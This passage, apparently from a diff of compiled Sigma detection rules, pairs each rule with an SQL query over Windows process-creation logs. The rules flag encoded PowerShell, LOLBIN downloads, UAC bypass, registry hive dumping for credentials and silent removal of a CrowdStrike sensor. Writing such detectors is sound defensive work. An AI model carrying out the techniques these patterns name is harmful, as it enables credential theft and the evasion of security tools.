CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -e kill %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\runonce.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND ParentCommandLine LIKE '%InstallHinfSection%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_susp_wsl.yml" + "filename": "proc_creation_win_rundll32_setupapi_installhinfsection.yml" }, { - "title": "Suspicious Execution of Powershell with Base64", - "id": "fb843269-508c-4b76-8b8d-88679db22ce7", - "status": "experimental", - 
"description": "Commandline to launch powershell with a base64 payload", + "title": "Use of PktMon.exe", + "id": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", + "status": "test", + "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1040" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -enco%' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% -Encoding %' ESCAPE '\\') OR ((ParentProcessName LIKE '%C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\gc\\_worker.exe%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pktmon.exe' ESCAPE '\\' OR OriginalFileName = 'PktMon.exe'))" ], - "filename": "proc_creation_win_powershell_encode.yml" + "filename": "proc_creation_win_lolbin_pktmon.yml" }, { - "title": "Regsvr32 Flags Anomaly", - "id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "title": "XSL Script Processing", + "id": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", "status": "test", - "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", - "author": "Florian Roth (Nextron Systems)", + "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. 
Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", + "author": "Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1220" ], "falsepositives": [ - "Unknown" + "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", + "Msxsl.exe is not installed by default, so unlikely.", + "Static format arguments - https://petri.com/command-line-wmi-part-3" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '% /i:%' ESCAPE '\\') AND NOT (CommandLine LIKE '% /n %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (CommandLine LIKE '%/format%' ESCAPE '\\' OR CommandLine LIKE '%-format%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Format:List%' ESCAPE '\\' OR CommandLine LIKE '%Format:htable%' ESCAPE '\\' OR CommandLine LIKE '%Format:hform%' ESCAPE '\\' OR CommandLine LIKE '%Format:table%' ESCAPE '\\' OR CommandLine LIKE '%Format:mof%' ESCAPE '\\' OR CommandLine LIKE '%Format:value%' ESCAPE '\\' OR CommandLine LIKE '%Format:rawxml%' ESCAPE '\\' OR CommandLine LIKE '%Format:xml%' ESCAPE '\\' OR CommandLine LIKE '%Format:csv%' ESCAPE '\\'))) OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_flags_anomaly.yml" + "filename": "proc_creation_win_wmic_xsl_script_processing.yml" }, { - "title": "Suspicious PowerShell Parameter Substring", - "id": "36210e0d-5b19-485d-a087-c096088885f0", - "status": "test", - "description": "Detects suspicious PowerShell invocation with a parameter substring", - "author": "Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)", 
+ "title": "Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell", + "id": "692f0bec-83ba-4d04-af7e-e884a96059b6", + "status": "stable", + "description": "Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.", + "author": "Markus Neis @Karneades", "tags": [ "attack.execution", + "attack.t1047", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "AppvClient", + "CCM", + "WinRM" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% -windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% -windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% -windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% -windowst h%' ESCAPE '\\' OR CommandLine LIKE '% -windows h%' ESCAPE '\\' OR CommandLine LIKE '% -windo h%' ESCAPE '\\' OR CommandLine LIKE '% -wind h%' ESCAPE '\\' OR CommandLine LIKE '% -win h%' ESCAPE '\\' OR CommandLine LIKE '% -wi h%' ESCAPE '\\' OR CommandLine LIKE '% -win h %' ESCAPE '\\' OR CommandLine LIKE '% -win hi %' ESCAPE '\\' OR CommandLine LIKE '% -win hid %' ESCAPE '\\' OR CommandLine LIKE '% -win hidd %' ESCAPE '\\' OR CommandLine LIKE '% -win hidde %' ESCAPE '\\' OR CommandLine LIKE '% -NoPr %' ESCAPE '\\' OR CommandLine LIKE '% -NoPro %' ESCAPE '\\' OR CommandLine LIKE '% -NoProf %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% -NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% -nonin %' ESCAPE '\\' OR CommandLine LIKE '% -nonint %' ESCAPE '\\' OR CommandLine LIKE '% -noninte %' ESCAPE '\\' OR CommandLine LIKE '% -noninter %' ESCAPE '\\' OR CommandLine LIKE '% -nonintera %' ESCAPE '\\' OR CommandLine LIKE '% -noninterac %' ESCAPE '\\' OR CommandLine LIKE '% -noninteract %' ESCAPE '\\' OR CommandLine LIKE '% -noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% 
-noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% -ec %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% -encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% -encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% -encodedC %' ESCAPE '\\' OR CommandLine LIKE '% -encoded %' ESCAPE '\\' OR CommandLine LIKE '% -encode %' ESCAPE '\\' OR CommandLine LIKE '% -encod %' ESCAPE '\\' OR CommandLine LIKE '% -enco %' ESCAPE '\\' OR CommandLine LIKE '% -en %' ESCAPE '\\' OR CommandLine LIKE '% -executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% -executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% -executionpol %' ESCAPE '\\' OR CommandLine LIKE '% -executionpo %' ESCAPE '\\' OR CommandLine LIKE '% -executionp %' ESCAPE '\\' OR CommandLine LIKE '% -execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% -executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% -execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% -exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass%' ESCAPE '\\' OR CommandLine LIKE '% /windowstyle h %' ESCAPE '\\' OR CommandLine LIKE '% /windowstyl h%' ESCAPE '\\' OR CommandLine LIKE '% /windowsty h%' ESCAPE '\\' OR CommandLine LIKE '% /windowst h%' ESCAPE '\\' OR CommandLine LIKE '% /windows h%' ESCAPE '\\' OR CommandLine LIKE '% /windo h%' ESCAPE '\\' OR CommandLine LIKE '% /wind h%' ESCAPE '\\' OR CommandLine LIKE '% /win h%' ESCAPE '\\' OR CommandLine LIKE '% /wi h%' ESCAPE '\\' OR CommandLine LIKE '% /win h %' ESCAPE '\\' OR CommandLine LIKE '% /win hi %' ESCAPE '\\' OR CommandLine LIKE '% /win hid %' ESCAPE '\\' OR CommandLine LIKE '% /win hidd %' ESCAPE '\\' OR CommandLine LIKE '% /win hidde %' ESCAPE '\\' OR CommandLine 
LIKE '% /NoPr %' ESCAPE '\\' OR CommandLine LIKE '% /NoPro %' ESCAPE '\\' OR CommandLine LIKE '% /NoProf %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfi %' ESCAPE '\\' OR CommandLine LIKE '% /NoProfil %' ESCAPE '\\' OR CommandLine LIKE '% /nonin %' ESCAPE '\\' OR CommandLine LIKE '% /nonint %' ESCAPE '\\' OR CommandLine LIKE '% /noninte %' ESCAPE '\\' OR CommandLine LIKE '% /noninter %' ESCAPE '\\' OR CommandLine LIKE '% /nonintera %' ESCAPE '\\' OR CommandLine LIKE '% /noninterac %' ESCAPE '\\' OR CommandLine LIKE '% /noninteract %' ESCAPE '\\' OR CommandLine LIKE '% /noninteracti %' ESCAPE '\\' OR CommandLine LIKE '% /noninteractiv %' ESCAPE '\\' OR CommandLine LIKE '% /ec %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComman %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComma %' ESCAPE '\\' OR CommandLine LIKE '% /encodedComm %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCom %' ESCAPE '\\' OR CommandLine LIKE '% /encodedCo %' ESCAPE '\\' OR CommandLine LIKE '% /encodedC %' ESCAPE '\\' OR CommandLine LIKE '% /encoded %' ESCAPE '\\' OR CommandLine LIKE '% /encode %' ESCAPE '\\' OR CommandLine LIKE '% /encod %' ESCAPE '\\' OR CommandLine LIKE '% /enco %' ESCAPE '\\' OR CommandLine LIKE '% /en %' ESCAPE '\\' OR CommandLine LIKE '% /executionpolic %' ESCAPE '\\' OR CommandLine LIKE '% /executionpoli %' ESCAPE '\\' OR CommandLine LIKE '% /executionpol %' ESCAPE '\\' OR CommandLine LIKE '% /executionpo %' ESCAPE '\\' OR CommandLine LIKE '% /executionp %' ESCAPE '\\' OR CommandLine LIKE '% /execution bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executio bypass%' ESCAPE '\\' OR CommandLine LIKE '% /executi bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execut bypass%' ESCAPE '\\' OR CommandLine LIKE '% /execu bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exec bypass%' ESCAPE '\\' OR CommandLine LIKE '% /exe bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ex bypass%' ESCAPE '\\' OR CommandLine LIKE '% /ep bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND 
Channel = 'Security') AND ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')))" ], - "filename": "proc_creation_win_powershell_susp_parameter_variation.yml" + "filename": "proc_creation_win_wmiprvse_spawns_powershell.yml" }, { - "title": "New Remote Desktop Connection Initiated Via Mstsc.EXE", - "id": "954f0af7-62dd-418f-b3df-a84bc2c7a774", - "status": "experimental", - "description": "Detects the usage of \"mstsc.exe\" with the \"/v\" flag to initiate a connection to a remote server.\nAdversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n", - "author": "frack113", + "title": "Exports Registry Key To a File", + "id": "f0e53e89-8d22-46ea-9db5-9d4796ee2f8a", + "status": "test", + "description": "Detects the export of the target Registry key to a file.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021.001" + "attack.exfiltration", + "attack.t1012" ], "falsepositives": [ - "WSL (Windows Sub System For Linux)", - "Other currently unknown software" + "Legitimate export of keys" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND CommandLine LIKE '% /v:%' ESCAPE '\\') AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lxss\\\\wslhost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Microsoft\\\\WSL\\\\wslg.rdp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /E %' ESCAPE '\\' OR CommandLine 
LIKE '% -E %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%hklm%' ESCAPE '\\' OR CommandLine LIKE '%hkey\\_local\\_machine%' ESCAPE '\\')) AND ((CommandLine LIKE '%\\\\system' ESCAPE '\\' OR CommandLine LIKE '%\\\\sam' ESCAPE '\\' OR CommandLine LIKE '%\\\\security' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_mstsc_remote_connection.yml" + "filename": "proc_creation_win_regedit_export_keys.yml" }, { - "title": "Suspicious File Download via CertOC.exe", - "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", - "status": "experimental", - "description": "Detects when a user downloads file by using CertOC.exe", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Reg Add Open Command", + "id": "dd3ee8cc-f751-41c9-ba53-5a32ed47e563", + "status": "test", + "description": "Threat actors performed dumping of SAM, SECURITY and SYSTEM registry hives using DelegateExecute key", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/ve %' ESCAPE '\\' AND CommandLine LIKE '%/d%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%DelegateExecute%' ESCAPE '\\') OR (CommandLine LIKE '%reg%' 
ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%hkcu\\\\software\\\\classes\\\\ms-settings%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_certoc_download.yml" + "filename": "proc_creation_win_reg_open_command.yml" }, { - "title": "LOLBIN From Abnormal Drive", - "id": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", + "title": "GfxDownloadWrapper.exe Downloads File from Suspicious URL", + "id": "eee00933-a761-4cd0-be70-c42fe91731e7", "status": "test", - "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "description": "Detects when GfxDownloadWrapper.exe downloads file from non standard URL", + "author": "Victor Sergeev, oscd.community", "tags": [ - "attack.t1218.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Rare false positives could occur on servers with multiple drives." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\') AND NOT ((CurrentDirectory LIKE '%C:\\\\%' ESCAPE '\\' OR CurrentDirectory = '') OR (CurrentDirectory = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%gameplayapi.intel.com%' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\GfxDownloadWrapper.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\igfxEM.exe' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_lolbin_not_from_c_drive.yml" + "filename": "proc_creation_win_lolbin_gfxdownloadwrapper_file_download.yml" }, { - "title": "Start Windows Service Via Net.EXE", - "id": "2a072a96-a086-49fa-bcb5-15cc5a619093", + "title": "Uninstall Crowdstrike Falcon Sensor", + "id": "f0f7be61-9cf5-43be-9836-99d6ef448a18", "status": "test", - "description": "Detects the usage of the \"net.exe\" command to start a service using the \"start\" flag", - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate administrator or user executes a service for legitimate reasons." + "Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% start %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\WindowsSensor.exe%' ESCAPE '\\' AND CommandLine LIKE '% /uninstall%' ESCAPE '\\' AND CommandLine LIKE '% /quiet%' ESCAPE '\\')" ], - "filename": "proc_creation_win_net_start_service.yml" + "filename": "proc_creation_win_uninstall_crowdstrike_falcon.yml" }, { - "title": "Suspicious Schtasks From Env Var Folder", - "id": "81325ce1-be01-4250-944f-b4789644556f", - "status": "experimental", - "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", - "author": "Florian 
Roth (Nextron Systems)", + "title": "Windows Admin Share Mount Via Net.EXE", + "id": "3abd6094-7027-475f-9630-8ab9be7b9725", + "status": "test", + "description": "Detects when an admin share is mounted using net.exe", + "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Benign scheduled tasks creations or executions that happen often during software installations", - "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" + "Administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\'))) AND NOT (((CommandLine LIKE '%update\\_task.xml%' ESCAPE '\\' OR CommandLine LIKE '%/Create /TN TVInstallRestore /TR%' ESCAPE '\\') OR ParentCommandLine LIKE '%unattended.ini%' ESCAPE '\\') OR (CommandLine LIKE '%/Create /Xml \"C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\.CR.%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_Security\\_Installation.xml%' ESCAPE '\\') 
OR (CommandLine LIKE '%/Create /F /TN%' ESCAPE '\\' AND CommandLine LIKE '%/Xml %' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND CommandLine LIKE '%Avira\\_%' ESCAPE '\\' AND (CommandLine LIKE '%.tmp\\\\UpdateFallbackTask.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\WatchdogServiceControlManagerTimeout.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\SystrayAutostart.xml%' ESCAPE '\\' OR CommandLine LIKE '%.tmp\\\\MaintenanceTask.xml%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/Create /TN \"klcp\\_update\" /XML %' ESCAPE '\\' AND CommandLine LIKE '%\\\\klcp\\_update\\_task.xml%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' AND CommandLine LIKE '% \\\\%\\\\%$%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_env_folder.yml" + "filename": "proc_creation_win_net_use_mount_admin_share.yml" }, { - "title": "Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS", - "id": "07aa184a-870d-413d-893a-157f317f6f58", - "status": "test", - "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "title": "Suspicious New Instance Of An Office COM Object", + "id": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", + "status": "experimental", + "description": "Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.\nThis can be used by malicious actors to create malicious Office documents with macros on the fly. 
(See vba2clr project in the references)\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", "attack.execution", - "attack.t1615", - "attack.t1059.005" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate usage of office automation via scripting" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_gather_network_info_execution.yml" + "filename": "proc_creation_win_office_svchost_parent.yml" }, { - "title": "Suspicious RazerInstaller Explorer Subprocess", - "id": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "title": "UAC Bypass Using Consent and Comctl32 - Process", + "id": "1ca6bd18-0ba0-44ca-851c-92ed89a61085", "status": "test", - "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems), Maxime Thiebaut", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ + "attack.defense_evasion", 
"attack.privilege_escalation", - "attack.t1553" + "attack.t1548.002" ], "falsepositives": [ - "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\RazerInstaller.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\Razer\\\\Installer\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\consent.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_exploit_other_razorinstaller_lpe.yml" + "filename": "proc_creation_win_uac_bypass_consent_comctl32.yml" }, { - "title": "Potential Meterpreter/CobaltStrike Activity", - "id": "15619216-e993-4721-b590-4c520615a67d", + "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", + "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "author": "John Lambert (rule)", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Commandlines containing components like cmd accidentally", - "Jobs and services started with cmd" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE 
'%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE '%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE 